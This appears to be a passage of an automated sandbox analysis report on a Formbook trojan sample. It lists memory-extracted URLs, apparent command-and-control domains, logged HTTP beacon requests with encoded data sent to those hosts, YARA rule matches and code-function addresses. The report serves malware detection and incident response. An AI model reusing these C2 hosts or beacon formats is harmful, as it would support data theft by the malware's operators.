          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nazadypro.shopReferer:
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ontheroadfromdamascus.com
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ontheroadfromdamascus.com/us94/
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ontheroadfromdamascus.com/us94/www.hot-tubs-59198.bond
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ontheroadfromdamascus.comReferer:
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.simarnit.com
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.simarnit.com/us94/
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.simarnit.com/us94/www.hanabi104.online
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.simarnit.comReferer:
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.soccercitycupsc.com
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.soccercitycupsc.com/us94/
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.soccercitycupsc.com/us94/www.69v39.top
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.soccercitycupsc.comReferer:
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.terminalcomputer.info
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.terminalcomputer.info/us94/
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.terminalcomputer.info/us94/www.b-cr5.ink
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.terminalcomputer.infoReferer:
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.truijkl.xyz
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.truijkl.xyz/us94/
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.truijkl.xyz/us94/www.j5tm84qrs.top
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BD57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.truijkl.xyzReferer:
          Source: explorer.exe, 00000003.00000000.1267280115.00000000093C3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2509722390.00000000093C3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000003.00000000.1263284729.00000000070C9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000003.00000000.1267280115.0000000009242000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2509722390.0000000009242000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
          Source: explorer.exe, 00000003.00000000.1267280115.00000000093F5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
          Source: explorer.exe, 00000003.00000000.1272310868.000000000BC1A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2516134404.000000000BC1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000003.00000002.2520807762.00000000105FF000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.2501650937.00000000056CF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
          Source: explorer.exe, 00000003.00000002.2520807762.00000000105FF000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.2501650937.00000000056CF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
          Source: explorer.exe, 00000003.00000002.2520807762.00000000105FF000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.2501650937.00000000056CF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
          Source: explorer.exe, 00000003.00000002.2520807762.00000000105FF000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.2501650937.00000000056CF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?
          Source: explorer.exe, 00000003.00000000.1272310868.000000000BC1A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2516134404.000000000BC1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
          Source: explorer.exe, 00000003.00000000.1272310868.000000000BB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2516134404.000000000BB08000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
          Source: explorer.exe, 00000003.00000000.1272310868.000000000BC1A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2516134404.000000000BC1A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
          Source: explorer.exe, 00000003.00000000.1267280115.000000000942F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2502312360.0000000004C47000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2509722390.00000000093F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1261252404.0000000004C4C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1261252404.0000000004C48000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
          Source: unknown | DNS traffic detected: queries for: www.emdefencetech.com
          Source: C:\Windows\explorer.exe | Code function: 3_2_08897F82 getaddrinfo,setsockopt,recv
          Source: global traffic | HTTP traffic detected: GET /us94/?FV9l7b=09CVAw2tWRgghkhUEy5C5oLzHr5PLkNGN/bgaCa/HPdap5UhvkEM57dmWPBbgbvu1iSh&BbW=QzuhmF0pKL HTTP/1.1 | Host: www.emdefencetech.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /us94/?FV9l7b=dEK1UcEseC60ArM7bnAGctGEpZul5aHqilxPZgyrfd7+4uauQhfO1u/GuBaUBJFU+KOU&BbW=QzuhmF0pKL HTTP/1.1 | Host: www.nazadypro.shop | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /us94/?FV9l7b=S5srMiwBCDtV4rjo3jAT9rEjkkSDttoSOLAmgXzTQBVP9tcOlEr2qFRjTuqDw5Sxe1FF&BbW=QzuhmF0pKL HTTP/1.1 | Host: www.soccercitycupsc.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /us94/?FV9l7b=gRE/KZOmUIl0E9O5tIrQ1aSnWhjtkyGjsCPW33OGocf8yDxoSBdOJbLmmBtR+4NwNN+r&BbW=QzuhmF0pKL HTTP/1.1 | Host: www.69v39.top | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:

          E-Banking Fraud

          Source: Yara match | File source: 2.2.2FcJgghyXg.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.2FcJgghyXg.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000004.00000002.2499211054.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.1253892439.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.2498941843.0000000003020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.2498297879.0000000002CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.1253892439.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 2.2.2FcJgghyXg.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.2FcJgghyXg.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.2FcJgghyXg.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.2FcJgghyXg.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.2FcJgghyXg.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.2FcJgghyXg.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2499211054.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.2499211054.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2499211054.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.1253892439.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1253892439.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.1253892439.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.2509035504.00000000088AF000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
          Source: 00000004.00000002.2498941843.0000000003020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.2498941843.0000000003020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2498941843.0000000003020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2498297879.0000000002CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.2498297879.0000000002CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2498297879.0000000002CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.1253892439.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1253892439.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.1253892439.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: 2FcJgghyXg.exe PID: 7656, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: 2FcJgghyXg.exe PID: 7700, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: msdt.exe PID: 7736, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2FcJgghyXg.exe, flogin.cs | Long String: Length: 230399
          Source: 2FcJgghyXg.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 2.2.2FcJgghyXg.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.2FcJgghyXg.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.2FcJgghyXg.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.2FcJgghyXg.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.2FcJgghyXg.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.2FcJgghyXg.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2499211054.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.2499211054.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2499211054.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.1253892439.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.1253892439.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.1253892439.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.2509035504.00000000088AF000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: 00000004.00000002.2498941843.0000000003020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.2498941843.0000000003020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2498941843.0000000003020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2498297879.0000000002CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.2498297879.0000000002CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2498297879.0000000002CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.1253892439.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.1253892439.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.1253892439.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: 2FcJgghyXg.exe PID: 7656, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: 2FcJgghyXg.exe PID: 7700, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: msdt.exe PID: 7736, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 1_2_0105D57C
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 1_2_08506158
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_00401030
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_0041E111
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_0041E1A2
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_00401209
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_0041E381
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_0041E517
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_00402D87
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_00402D90
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_0041D593
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_00409E4D
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_00409E50
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_0041DEE3
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_00402FB0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_0185E1B6
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_0179F113
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_017BB100
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_01862106
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_018700A3
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_017B7010
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_0186F0FF
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_0186A012
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_017A00A0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_017F734A
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_017BE340
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_017A13C0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_0184D280
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_017CB220
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_0179D2EC
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_01867231
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_0187024E
          Source: C:\Windows\explorer.exe | Code function: 3_2_08897232
          Source: C:\Windows\explorer.exe | Code function: 3_2_0888D082
          Source: C:\Windows\explorer.exe | Code function: 3_2_08896036
